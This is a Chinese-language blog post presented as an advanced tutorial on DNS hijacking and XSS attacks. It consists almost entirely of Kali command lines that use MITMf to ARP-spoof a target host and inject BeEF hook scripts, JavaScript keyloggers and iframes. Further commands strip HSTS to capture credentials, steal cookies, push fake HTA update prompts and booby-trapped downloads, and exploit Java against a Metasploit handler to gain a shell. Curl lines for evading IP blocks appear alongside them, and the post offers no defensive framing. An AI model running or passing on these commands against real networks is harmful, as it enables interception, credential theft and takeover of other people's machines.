美文网首页
DNS劫持+XSS攻击高级教程:

DNS劫持+XSS攻击高级教程:

作者: 我准备注销了请取关 | 来源:发表于2019-04-08 12:53 被阅读0次

    安装方式一:

    安装32位环境:

    root@kali:~# apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file

    安装Mitmf:

    root@kali:~# apt-get install mitmf
    root@kali:~# pip uninstall Twisted
    root@kali:~# wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2
    root@kali:~# pip install ./Twisted-15.5.0.tar.bz2

    安装方式二:

    root@kali:~# get clone https://github.com/byt3bl33d3r/MITMf.git

    安装装python-nfqueue+pefile模块:

    root@kali:~# sudo apt-get install python-nfqueue,pefile
    root@kali:~# sudo apt-get install mitmf*
    root@kali:~# pip uninstall twisted
    root@kali:~# wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2
    root@kali:~# pip install ./Twisted-15.5.0.tar.bz2

    启动Beef:

    root@kali:~# cd /usr/share/beef-xss/
    root@kali:~# ./beef

    利用BeEFAutorun结合Beef-XSS自动工具:

    root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --beefautorun

    Mitmf中间人注入XSS脚本,作为中间人连接网页并插入JS:

    root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --inject --js-url http:// 192.168.1.114:3000/hook.js

    注入Html iframe框架:

    root@kali:~# mitmf -i eth0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.114 --inject --html-url http://www.freebuf.com

    注入JavaScript:

    root@kali:~# mitmf -i eth0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.114 --inject --js-url http://linvex.xxx.cn/test.js

    注入键盘记录JS:

    root@kali:~# mitmf -i eth0 --spoof –-arp  –-gateway 192.168.1.1 –-target 192.168.1.114 --jskeylogger

    查看网页Http Response头指纹信息:

    root@kali:~# curl -i url

    查看网页HTTP通信过程信息:

    root@kali:~# curl -v url

    查看网址301+302跳转访问情况:

    root@kali:~# curl -IL url

    抓取页面内容到一个文件中:

    root@kali:~# curl -o home.html url

    模拟服务器Post请求:

    root@kali:~# curl -vX POST "URL" -d "name=123.jpg"

    模拟客服端发送表单数据:

    root@kali:~# curl -d "user=aaa&password=12345" http://www.aaa.com/login.php

    方案一:

    表单XML上传代码:

    <form method="post" action="http://upload.qiniu.com/"
    enctype="multipart/form-data">
      <input name="key" type="hidden" value="<resource_key>">
      <input name="token" type="hidden" value="<upload_token>">
      <input name="file" type="file" />
    </form>

    模拟表单信息上传:

    root@kali:~# curl -v -F 'key=21211' -F 'token=um6IEH7mtwnwkGpjImD08JdxlvViuELhI4mFfoeL:ibL-L03gPbF0Yyjf1XlWiwkRk1s=:eyJzY29wZSI6ImphdmFkZW1vIiwiZGVhZGxpbm' -F 'file=@/Users/dxy/sync/photo3.jpg' 183.136.139.10

    模拟代理节点:

    root@kali:~# curl -voa  up.qiniu.com -F"token=um6IEH7mtwnwkGpjImD08JdxlvViuELhI4mFfoeL:ibL-L03gPbF0Yyjf1XlWiwkRk1s=:eyJzY29wZSI6ImphdmFkZW1vIiwiZGVhZGxpb" -F"file=@10M.file -x 1.1.1.1:80

    方案二:

    表单XML上传代码:

    <form method="POST" enctype='multipart/form-data' action="upload.cgi">
    <input type=file name=upload>
        <input type=submit name=press value="OK">
      </form>

    利用Curl上传文件:

    root@kali:~# curl --form upload=@localfilename --form press=OK url

    保存服务器返回Cookie到文件中:

    root@kali:~# curl -c cookies url

    使用Cookie文件做后续工作:

    root@kali:~# curl -b cookies url

    利用Curl发送Cookie:

    root@kali:~# curl --cookie "name=xxx" url

    利用Curl绕过User-Agent认证:

    curl --user-agent "User Agent" url

    利用Curl代理绕过屏蔽IP:

    root@kali:~# curl -x 24.10.28.84:32779 -o home.html url

    模拟表单信息,模拟登录,保存头信息:

    root@kali:~# curl -D ./cookie_D.txt -F log=aaaa -F pwd=xxxx url/login.php

    利用Hsts模块执行ARP欺骗并抓取密文:

    root@kali:~# mitmf -i eth0 --spoof --arp  --hsts --gateway 192.168.0.1 --targets 192.168.1.114

    利用AppCachePoison模块进行ARP投毒:

    root@kali:~# mitmf -i eth0 --spoof --arp --gateway 192.168.1.1 –-target 192.168.1.114 --app cache poison

    利用HTA Drive-By注入假更新通知并提示下载:

    root@kali:~# mitmf -i eth0 --spoof –-arp  –-gateway 192.168.1.1 –-target 192.168.1.114 --hta drive-by

    利用BrowserSniper执行HTA Drive-by攻击:

    root@kali:~# mitmf -i eth0 --spoof –-arp  –-gateway 192.168.1.1 –-target 192.168.1.114 --browsersniper

    利用Jskeylogger模块监听键盘记录:

    root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --jskeylogger

    利用Upsidedownternet模块获取图片:

    root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.0.114 --upsidedownterne

    利用Screen模块截屏:

    root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --screen

    利用Replace模块替换靶机网页:

    root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --replace

    利用Ferretng模块获取靶机Cookie:

    root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.11 --target 192.168.1.114 --ferretng

    利用Cachekill模块清除靶机Cookies:

    root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.11 --target 192.168.1.114 --cachekill

    利用Browserprofiler模块获取浏览器及插件信息:

    root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --browserprofiler

    利用Smbtrap模块进行SMB打印服务445端口:

    root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --smbtrap
    root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --smbauth

    利用Javapwn模块进行Java漏洞攻击:

    root@kali:~# mitmf -i eth0 --spoof --gateway 192.168.217.2 --target 192.168.1.114 --javapwn --msfip 192.168.1.100

    启动Metasploit模块并监听:

    root@kali:~# msfconsole
    root@kali:~# use exploit/multi/handler
    root@kali:~# set LHOST 192.168.1.114
    root@kali:~# set LPORT 1447
    root@kali:~# run

    欺骗靶机下载文件:

    mitmf --iface eth0 --spoof --gateway 192.168.1.1 --target 192.168.1.114 --filepwn
    注:通过MSF获取靶机Shell即可拿到主机!

    相关文章

      网友评论

          本文标题:DNS劫持+XSS攻击高级教程:

          本文链接:https://www.haomeiwen.com/subject/qlsuiqtx.html